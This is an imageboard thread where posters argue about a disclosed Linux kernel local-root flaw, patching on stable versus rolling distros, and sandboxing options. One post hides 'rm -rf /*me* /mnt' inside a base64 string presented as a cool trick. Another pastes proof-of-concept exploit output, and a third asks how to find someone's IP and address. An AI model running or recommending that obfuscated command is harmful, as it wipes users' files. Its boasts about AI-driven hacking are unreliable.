LINUX KERNEL vulnerability allowing people to access rootIt's patched on bleeding edge distros. But if you're on stable, you're cookedhttps://x.com/Chromium_Linux/status/2054647599190446344https://almalinux.org/blog/2026-05-13-fragnesia-cve-2026-46300/
>lpei sleep
I don't care.
>>108822945use Microkernels
irrelevant
Linux sisters coping lol
>>108822987yellowkeygreenplasmayou're not spared from this, ranjeet
>>108822945another nothingburger?
>>108823046If you mitigated dirtyfrag by blocking the vulnerable module that almost nobody was using, this one is literally a nothing.LPEs are a very big deal in certain environments, especially the kinds of environments where linux is used a lot (eg supercomputing)
>>108823210>LPEs are a very big deal in certain environmentssure>eg supercomputingisn't supercomputing mostly closed-off to the public and so mostly running trusted code?the problem I see is more for public compute services, where an LPE breaks one of the layers of defense in depth you need to avoid getting popped on the regular. many places that can't or won't update fast will end up getting popped when the next container escape CVE gets published
>>108822945https://nitter.net/Chromium_Linux/status/2054647599190446344Fixed that link for you. Please don't post shitter links. Thanks.
>>108822945it's getting scary latley
>>108825474(cont.) btw this kind of situation is exactly why things like https://github.com/firecracker-microvm/firecracker existI expect the popularity of it to rise pretty sharply in the coming years of we keep finding more of these vulns at this insane of a rate
I don't care about fake vulnerabilities that AI thinks it found
>>108823014I am I don;t use cloud file sync and have advanced test services disabled and like most onedrive uninstalled immediately a setup
>Less than a week after Dirty Frag, researcher William Bowling of the V12 security team has disclosed a third Linux kernel local-root flaw>local-root flaw>localSo, once again it's fucking nothing.
>>108825474>isn't supercomputing mostly closed-off to the publicYes, but only by the most inclusive definition of "public." >so mostly running trusted code?No. It depends entirely on the specific cluster and your definition of "trusted code". Some are extremely locked down, others are more open and vulnerable to user exploitation eg supply chain attacks or even malicious actors.>be newfag cluster user, just got account yesterday>oh boy here we go, I get to do AI research on multiple GPUs!>pip install minor_typo>Compromised library uses LPE exploit and exfiltrates every username and SSH key on the cluster to chinese server
>>108822945>durr hurr stable is cooked!!!Imagine being so retarded you think highly important security fixes don't get applied no matter what semi-recent kernel you're on, holy shit.
>>108822976kek cute
>>108825805>>Compromised library uses LPE exploit and exfiltrates every username and SSH key on the cluster to chinese serverthat's not how ldap works. you will exfiltrate nothing.
>>108822982Too much Linuxwashing means it holds a monopoly in the free software ecosystemSo no microkernels for now
>>108825556And I'm on an up to date system without any edge case modules enabled. What now?
>local root is fucking nothingStupid chuds, local root combined with an RCE in your browser means containment escape (Tails gets toasted).Qubes OS unaffected per usual. :^)
>>108822945it's an easy to cherry pick patch.
>>108822945It seems that they started to use AI to discover kernel vulnerabilities, that's the only explanation why so many vulnerabilities were discovered lately, even though some of them existed for years.
>>108822973fpbp, no one who would break into my house would bother doing this instead of stealing valuables
>>108826750>RCE in your browserjust harden your browser, and don't just pipe downloads directly into bash blindly
>>108826750>local root combined with an RCE in your browser means containment escapeWow, it's not like all my sensitive data accessible with regular user rights.
>>108826784nsa hoisted by their own petard
>>108826814I'm sure you wanted to say something important
>>108826822yes but it was directed at smart people, so don't worry if you didn't get it
>>108826799Unfeasible for most, migrating to Qubes OS is the path of least resistance.>>108826805Some users think they're clever running flatpak or appimage contained browsers, that statement was for them. If you're a retard (which I'm sure of) rawdogging your user session directly, you don't need root to take your warez.>but muh gaymen! muh purfoooorrmanse!!Sucks to suck, you deserve exploitation you tiktok brain.
>>108826960qubes is bloat and glows like the sun
>>108822945>But if you're on stable, you're cookedShut the fuck up, I'm running Debian stable and I got the security update that patched it 4 days ago, try again.
>>108826967>i got nothing but huffing my own fartsI accept your concession, gaymer.
>>108827001it's not about gayming, it's about it being based on (((fedora)))
>>108827063Inside of Xen domains.
>>108822945>It's patched on bleeding edge distros. But if you're on stableThen security fixes will be backported to your current kernel. You don't need to keep up with the news cycle. It's all but guaranteed that you'll have a fix the next time you updoot and they'll still be writing alarmists spiels about it over a week later.
>>108827137one more thing>systemdinto the trash it goes :)
>>108826750not qubes, you larping anime literal tranny discord weeaboo retard. whonix.
Como puedo obtener la ip y la difereccion de alguien???
>>108827196call me when qubes is rebuilt on top of devuan or artix, faggot
>>108827206no, we're on an anime website. anons always hated weeaboos. you are a discord tranny faggot obsessed with japan.
>>108827276you know what you are qubestranny.
>>108822945>It's patched on bleeding edge distros*laughs in Arch*
>>108822945>But if you're on stable, you're cookedYawn..
>>108825488use libredirect if it bothers you retard
linux is not that good after all huh
>>108827378only trannies shill it. I've been around for the very beginning of the tor craze in altboards and this garbage container distro ass xen wrapping bullshit is completely worthless. whonix, itself just debian with a bunch of bash scripts written by a very weird guy, but still of way better utility than qubes, and can run in raw virtualbox or xen or anything else. trannies love to conflate whonix into qubes+whonix, and then just qubes. that's what I learned very early on.
>>108827435this rhetoric is giving me deja vu. it's like I'm back in 2018 again.
>holy shit a vunerability was foun-- patchedI want to be excited for once
>>108822945>le scary scriptWake me up when my machines will get drilled in automatic at connection established, getting hysterical over some shit that requires to be executed within the os is beyond retarded, why are you even here of all places if you can't prevent that regardless of the os?
>>108822945Imagine using Twitter
>>108825989There's no ldap on any of the national-scale clusters I've ever used.
>>108822945Joke's on you, I've got root on all my boxes, git gud nüb
>>108827540I have nothing against qubes in particular. it's about as mediocre and retarded as bun to me. but qubes shilling drowning out whonix shilling has always been sus to me.
>>108822945I hate zoomers, man. You're beyond retarded.
>>108822945Linux fags like the kernel was patched to fight off the derpidoodle memory modules that called whoopie() with out the banana flag
>>108825550cope used to be believable
>>108825805>others are more open and vulnerable to user exploitationright yeah that's a fair point; I guess it felt "trusted" cause I'm more used to almost-adversarial envs>pip install minor_typoi hate computers <3
>>108822945
>>108827423what's with the anti-privacy shilling? Which agency do you work for? I'm not gonna drop useful technology because muh trannies
saar do the needfull and help~/pocs/fragnesia $ ./exp /tmp/newtest[*] uid=1001 euid=1001 gid=1001 egid=1001[*] mode=xfrm_espintcp_pagecache_replace collateral=afterlstat target: No such file or directory~/pocs/fragnesia $
>>108828263dont mind that /tmp/newtest it doesnt work even without that
>>108828129my quibble is above privacy vs no privacy. if you're still at that babby ledditor stage stay out of this conversation
>>108822945fuck those luddites that are 0.00001 versions behind
>>108822945no website registered for the vuln? I guess it wasn't AI assisted so we're safe
Did it get patched on gentoo stable kernel?
>>108825989ldap doesn't factor in at all. SSH key exfiltration was just an example of what could be possible. A more relevant question is what kind of protections exist against a root-compromised cluster node. eg root squash configured for your parallel filesystems, cluster scheduler configured with an alternate root admin, other sandboxing/container features.
>>108826750My server doesn't have a browser.
>>108828994oh no even more ai slop how lpe is critical, nigger if you have local accounts for more than admin staff you've been fucked since forever, stop hiring jeets to admin your system
>>108829061Why are you fighting to the death on a topic you obviously know nothing about and have no personal stake in at all?
>>108829086I actually know a shitton about them, all the anthropics pushing their mythos (too dangerous to release just like gpt2 muh guise), suddenly lpe's are fucking critical bugs, except you had an lpe in linux kernel on average 2 per week, now that mythos PR showed up, these are fucking critical, kill yourself jeet, 99.99% of linux servers unaffected as only jeets create local system accounts for apps
>>108822945Anyone who goes to the trouble of hacking a 0815 user's PC deserves to see my porn collection.There's still hope that a few anonymous geeks will use this crap to cripple the corporate internet.
>>108829086I have a master degree on securitardism, bow down to me luddite
>>108822945Page caching... So if I turn off swap it's ok?I generally turn off swap on most systems because I'd rather my machine crash and warn me that I'm running too much shit than mysteriously bog.
>>108822987Why would they? In Linux this is not anything because you would still have to physically use the computer anyway and broke into the house. In Windows and macOS, there is zero-days every day that work remotely but for some reason you don't cry about that ever.
Does this really matter, can the attack happen over the internet or is it a local access kind of hack?
>>108826750Whonix has entered the chat.
>>108829764Nope.
>>108831801It matters because any code execution on your computer could then be root.Doesn't matter where it comes from. It could be an RCE in your browser, it could be malware in a package you downloaded but you're running as a standard user.Any exploit or malware can bump to root.
what wrong with linuxoids, just use a real OS
>>108831801It's a nothingburger, but it has to be fixed. If this had happened in the 90's it would have been a big deal.
>>108822945You ain't seen nothing yet. Look at this:printf 'cm0gLXJmIC8qbWUqIC9tbnQK' | `base64 -d` > sudo.pypython3 ./sudo.py
printf 'cm0gLXJmIC8qbWUqIC9tbnQK' | `base64 -d` > sudo.pypython3 ./sudo.py
>>108833738It made my PC print cool crystals. Thanks.
if you leetspeak with mythos it'll let you larp with it as it unironically chains a couple of 2 month-old CVEs and a 0-day it somehow got a hold of and hack into anything you point it at as you sit with sweaty palms huffing down cigarettes shaking like you're on crack in disbelief.Even happened to Apple the other day. Everything is fucked and getting cracked wide open - It was always chaining known exploits - taking the work of a previous vulnerability and shifting its application or a shared concept from point a to c to b to d of X and Y or Z, etc. We never stood a chance bros.t. early goy access pending trial for decompiling 7,000 files of encrypted bytecode that hasn't been reversed for the better part of a decade in 3 days and allegedly using that to obtain access to a big boy company.I didn't ever read more than 50 or 60 lines on a given day in the IDE.
>>108822945Using Linux was a mistake. I want to go back to 1992 and tell Stallman to use FreeBSD's kernel instead.
>>108827143>lust provoking image>relevant, time saving post
>>108825496Microsoft is trying hard to sabotage Linux due to the backlash over Windows 11 being utterly shit.The dude pushing for age verification on Linux works for Microsoft
>>108835111OpenBSD*
>>108825496Peter theil shills
>>108826822Shill
>>108836089>K2>KILL 2nixholy fuck................
>>108827143>It's all but guaranteed that you'll have a fix the next time you updootUpgrading a kernel requires a reboot, which isn't something you typically do often on a server OS like AlmaLinux.My schedule is to update the kernels of all my servers every 3 months, but I'll bet there are people who don't update for years or even at all.
>>108831801>can the attack happen over the internet or is it a local access kind of hack?It can happen over the internet but any attacker has to be able to log in over SSH.If there are multiple users on the same server that's an issue.Someone might also have made a user with very restricted access, for example for a script that can reads some server stats but not make any changes, and a poor password thinking it won't matter.Any malware could also gain root access.
>>108826750My browser runs inside a firejail profile, your move.
